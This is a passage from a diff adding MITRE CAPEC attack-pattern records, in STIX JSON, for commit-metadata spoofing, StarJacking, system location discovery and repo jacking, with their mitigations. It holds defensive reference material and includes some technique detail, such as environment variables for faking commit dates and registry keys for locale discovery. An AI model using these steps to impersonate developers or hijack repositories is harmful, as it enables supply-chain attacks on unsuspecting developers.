"2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52eb880e-2ac1-4c33-9b9a-eac91f006aa8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e9315979-36e7-483d-9185-50c390965b76", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "spec_version": "2.1", + "target_ref": "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs metadata pertaining to a Version Control System (VCS) (e.g., Git) repository's commits to deceive users into believing that the maliciously provided software is frequently maintained and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-692", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/692.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Aviad Gershon, Unverified Commits: Are You Unknowingly Trusting Attackers’ Code?, 2022--07---15, Checkmarx", + "external_id": "REF-719", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/" + }, + { + "description": "Deeba Ahmed, Hackers can spoof commit metadata to create false GitHub repositories, 2022--07---17, HackRead", + "external_id": "REF-720", + "source_name": "reference_from_CAPEC", + "url": "https://www.hackread.com/hackers-spoof-commit-metadata-false-github-repositories/" + } + ], + "id": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Version Control System Commit Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In July 2022, Checkmarx reported that GitHub commit metadata could be spoofed if unsigned commits were leveraged by the repository. Adversaries were able to spoof commit contributors, as well as the date/time of the commit. This resulted in commits appearing to originate from trusted developers and a GitHub activity graph that duped users into believing that the repository had been maintained for a significant period of time. The lack of commit metadata validation ultimately allowed adversaries to propagate malware to unsuspecting victims [REF-719] [REF-720]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository for them to spoof. Typically, this will be a popular and widely used repository, as to increase the amount of victims a successful attack will exploit.

Experiment

  1. Create malicious repository: The adversary must create a malicious repository that imitates the legitimate repository being spoofed. This may include creating a username that closely matches the legitimate repository owner; creating a repository name that closely matches the legitimate repository name; uploading the legitimate source code; and more.

  2. Spoof commit metadata: Once the malicious repository has been created, the adversary must then spoof the commit metadata to make the repository appear to be frequently maintained and originating from trusted sources.

    3. Techniques
    Git Commit Timestamps: The adversary generates numerous fake commits while setting the \"GIT_AUTHOR_DATE\" and \"GIT_COMMITTER_DATE\" environment variables to a date which is to be spoofed.
    Git Commit Contributors: The adversary obtains a legitimate and trusted user's email address and then sets this information via the \"git config\" command. The adversary can then commit changes leveraging this username.

Exploit

  1. Exploit victims: The adversary infiltrates software and/or system environments with the goal of conducting additional attacks.

    2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious software by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage malicious software.
", + "x_capec_extended_description": "\n Version Control Systems are widely used by developers to host, track, and manage source code files in an easy and synchronous manner. These systems are often leveraged to host open-source software that other developers can incorporate into their own applications or use as standalone applications. To prevent downloading vulnerable and/or malicious code, developers will often check the metadata of VCS repository commits to determine the repository's overall pedigree. This may include a variety of information, such as the following:\n \n Owner of the repository\n Author(s) of commits\n Frequency of commits\n Date/Time of commits\n Repository activity graphs\n \n These precursory checks can assist developers in determining whether a trusted individual/organization is providing the source code, how often the code is updated, and the relative popularity of the software. However, an adversary can spoof this metadata to make a repository containing malicious code appear as originating from a trusted source, being frequently maintained, and being commonly used by other developers. Without performing additional security activities, unassuming developers may be duped by this spoofed metadata and include the malicious code within their systems/applications. The adversary is then ultimately able to achieve numerous negative technical impacts, while the victim remains unaware of any malicious activity.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source repository whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of repository metadata to convince victims the source is trusted." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a72b8ce4-be42-4668-a7c7-bf42c0c9a408", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c736e80-28c8-4d55-b991-897bf3b192ba", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8f777fea-dec1-4d43-ad73-97e207a594cd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6c36b44-edcc-444c-8c35-21a03d8ee380", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c80df8f5-a98b-488d-8935-509df5316146", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--de99bf76-30c8-4404-93f4-f13f77c8c840", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6766b25b-c346-4b4b-8542-35002e050f31", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c4960b11-f2fc-4d00-8514-1091d252ab75", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--760cd567-fe77-43b8-bd40-b612331562da", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--35081dad-0306-4c1a-8b0f-a021e8e1c1f3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c1ee87f-e7db-4b4b-a3ab-a9bf2ef24557", + "spec_version": "2.1", + "target_ref": "attack-pattern--e6eccd63-6c72-4500-830e-22c937a2bd4b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular GitHub repository URLs with the malicious package. This can further lead to developers unintentionally including the malicious package within their development environments [REF-721]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target package whose popularity statistics will be leveraged. This will be a popular and widely used package, as to increase the perceived pedigree of the malicious package.

Experiment

  1. Spoof package popularity: The adversary provides their malicious package to a package manager and uses the source code repository URL identified in Step 1 to spoof the popularity of the package. This malicious package may also closely resemble the legitimate package whose statistics are being utilized.

Exploit

  1. Exploit victims: The adversary infiltrates development environments with the goal of conducting additional attacks.

    2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious package by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage the malicious package.
", + "x_capec_extended_description": "\n Many open-source software packages are hosted via third-party package managers (e.g., Node Package Manager, PyPi, Yarn, etc.) that allow for easy integration of software components into existing development environments. A package manager will typically include various metadata about the software and often include a link to the package's source code repository, to assist developers in determining the trustworthiness of the software. One common statistic used in this decision-making process is the popularity of the package. This entails checking the amount of \"Stars\" the package has received, which the package manager displays based on the provided source code repository URL. However, many package managers do not validate the connection between the package and source code repository being provided. Adversaries can thus spoof the popularity statistic of a malicious package by associating a popular source code repository URL with the package. This can ultimately trick developers into unintentionally incorporating the malicious package into their development environment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source package whose popularity metadata is to be used for the malicious package." + ], + "x_capec_skills_required": { + "Low": "Ability to provide a package to a package manager and associate a popular package's source code repository URL." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source packages, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--e7cd94ea-7540-46fe-9c3d-b733cc6c99a4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--121521c5-1405-4f51-a48a-37cafa458320", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e7cd94ea-7540-46fe-9c3d-b733cc6c99a4", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--7c548f97-7bf6-4c36-a45b-b398c4d12510", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6156b485-fc27-474d-8a38-7cf7ec87b01f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c548f97-7bf6-4c36-a45b-b398c4d12510", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39f9a1c9-9ce1-4bf9-83ef-c834b884842a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a204dbb2-3715-4055-8ac3-8f999c400a40", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--8a83580e-2107-4544-96a2-1fa66d034fd0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a535c2f9-17fa-48e9-8df4-4b1a11500540", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a83580e-2107-4544-96a2-1fa66d034fd0", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source packages, ensure integrity values have not changed.", + "id": "course-of-action--7a44241f-74a4-48d1-ac7c-13697e53cdc7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7b24cf80-b39b-4468-b413-3d55da744848", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a44241f-74a4-48d1-ac7c-13697e53cdc7", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the package, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--4b83b151-8ca4-439e-bd2a-a39d24160e2f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a81e3538-db6b-4c00-bdd2-de44d84670da", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b83b151-8ca4-439e-bd2a-a39d24160e2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--1c976e18-0d56-40b0-9168-90402604c16d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary collects information about the target system in an attempt to identify the system's geographical location.\n Information gathered could include keyboard layout, system language, and timezone. This information may benefit an adversary in confirming the desired target and/or tailoring further attacks.\n ", + "external_references": [ + { + "external_id": "CAPEC-694", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/694.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "System Language Discovery", + "external_id": "T1614", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1614" + }, + { + "description": "Language-Specific Registry Entries", + "external_id": "REF-727", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/previous-versions/windows/desktop/indexsrv/language-specific-registry-entries" + }, + { + "description": "winnls.h header", + "external_id": "REF-728", + "source_name": "reference_from_CAPEC", + "url": "https://learn.microsoft.com/en-us/windows/win32/api/winnls/" + }, + { + "description": "local (1p) - Linux Man Pages", + "external_id": "REF-729", + "source_name": "reference_from_CAPEC", + "url": "https://www.systutorials.com/docs/linux/man/1p-locale/" + }, + { + "description": "vconsole.conf", + "external_id": "REF-730", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/vconsole.conf.html" + }, + { + "description": "timedatectl", + "external_id": "REF-731", + "source_name": "reference_from_CAPEC", + "url": "https://www.freedesktop.org/software/systemd/man/timedatectl.html" + } + ], + "id": "attack-pattern--296d0305-8a72-4f50-b702-cc56e90a7749", + "modified": "2022-09-29T00:00:00.000Z", + "name": "System Location Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. System Locale Information Discovery: The adversary examines system information from various sources such as registry and native API functions and correlates the gathered information to infer the geographical location of the target system

    2. Techniques
    Registry Query: Query the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language\\Language_Dialect on Windows to obtain system language, Computer\\HKEY_CURRENT_USER\\Keyboard Layout\\Preload to obtain the hexadecimal language IDs of the current user's preloaded keyboard layouts, and Computer\\HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation to obtain the system timezone configuration
    Native API Requests: Parse the outputs of Windows API functions GetTimeZoneInformation, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID to obtain information about languages, keyboard layouts, and timezones installed on the system or on macOS or Linux systems, query locale to obtain the $LANG environment variable and view keyboard layout information or use timeanddatectl status to show the system clock settings.
    Read Configuration Files: For macOS and Linux-based systems, view the /etc/vconsole.conf file to get information about the keyboard mapping and console font.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have some level of access to the system and have a basic understanding of the operating system in order to query the appropriate sources for relevant information." + ], + "x_capec_resources_required": [ + "The adversary requires access to the target's operating system tools to query relevant system information. On windows, registry queries can be conducted with powershell, wmi, or regedit. On Linux or macOS, queries can be performed with through a shell." + ], + "x_capec_skills_required": { + "Low": "The adversary must know how to query various system sources of information respective of the system's operating system to obtain the relevant information." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To reduce the amount of information gathered, one could disable various geolocation features of the operating system not required for system operation.", + "id": "course-of-action--bd4e4c20-69fb-4a3a-bc82-a775ce196516", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-694-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--30d76a29-95d8-4907-ba95-9c42d2ec7b3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd4e4c20-69fb-4a3a-bc82-a775ce196516", + "spec_version": "2.1", + "target_ref": "attack-pattern--296d0305-8a72-4f50-b702-cc56e90a7749", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.\n ", + "external_references": [ + { + "external_id": "CAPEC-695", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Indiana Moreau, Repo Jacking: Exploiting the Dependency Supply Chain, 2020--10---22, Security Innovation", + "external_id": "REF-722", + "source_name": "reference_from_CAPEC", + "url": "https://www.concretecms.org/about/project-news/security/supply-chain-hack-phpass-repo-jacking" + }, + { + "description": "Theo Burton, CyRC Vulnerability Analysis: Repo jacking in the software supply chain, 2022--08---02, Synopsys", + "external_id": "REF-732", + "source_name": "reference_from_CAPEC", + "url": "https://www.synopsys.com/blogs/software-security/cyrc-vulnerability-analysis-repo-jacking/" + }, + { + "description": "Jossef Harush, Attacker Caught Hijacking Packages Using Multiple Techniques to Steal AWS Credentials, 2022--05---25, Checkmarx", + "external_id": "REF-733", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/attacker-caught-hijacking-packages-using-multiple-techniques-to-steal-aws-credentials/" + }, + { + "description": "Jossef Harush, GitHub RepoJacking Weakness Exploited in the Wild by Attackers, 2022--05---27, Checkmarx", + "external_id": "REF-734", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/github-repojacking-weakness-exploited-in-the-wild-by-attackers/" + } + ], + "id": "attack-pattern--e3dd79e7-307b-42dd-9e22-d0345c0ec001", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Repo Jacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Read Data", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In May 2022, the CTX Python package and PhPass PHP package were both exploited by the same adversary via Repo Jacking attacks. For the CTX package, the adversary performed an account takeover via a password reset, due to an expired domain-hosting email. The attack on PhPass entailed bypassing GitHub's authentication for retired repositories. In both cases, sensitive data in the form of API keys and passwords, each stored in the form of environment variables, were exfiltrated. [REF-732] [REF-733]\n ", + "\n In October 2021, the popular JavaScript library UAParser.js was exploited via the takeover of the author's Node Package Manager (NPM) account. The adversary-provided malware downloaded and executed binaries from a remote server to conduct crypto-mining and to exfiltrate sensitive data on Windows systems. This was a wide-scale attack as the package receives 8 to 9 million downloads per week. [REF-732]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository that is commonly used and whose owner/maintainer has either changed/deleted their username or transferred ownership of the repository and then deleted their account. The target should typically be a popular and widely used package, as to increase the scope of the attack.

Experiment

  1. Recreate initial repository path: The adversary re-registers the account that was renamed/deleted by the target repository's owner/maintainer and recreates the target repository with malicious code intended to exploit an application. These steps may need to happen in reverse (i.e., recreate repository and then rename an existing account to the target account) if protections are in place to prevent repository reuse.

Exploit

  1. Exploit victims: The adversary's malicious code is incorporated into applications that directly reference the initial repository, which further allows the adversary to conduct additional attacks.

", + "x_capec_extended_description": "\n Software developers may directly reference a VCS repository (i.e., via a hardcoded URL) within source code to integrate the repository as a dependency for the underlying application. If the repository owner/maintainer modifies the repository name, changes their VCS username, or transfers ownership of the repository, the VCS implements a redirect to the new repository location so that existing software referencing the repository will not break. However, if the original location of the repository is reestablished, the VCS will revert to resolving the hardcoded path. Adversaries may, therefore, re-register deleted or previously used usernames and recreate repositories with malicious code to infect applications referencing the repository. When an application then fetches the desired dependency, it will now reference the adversary's malicious repository since the hardcoded repository path is once again active. This ultimately allows the adversary to infect numerous applications, while achieving a variety of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular repository that may be directly referenced in numerous software applications", + "A repository owner/maintainer who has recently changed their username or deleted their account" + ], + "x_capec_skills_required": { + "Low": "Ability to create malware that can exploit various software applications." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + 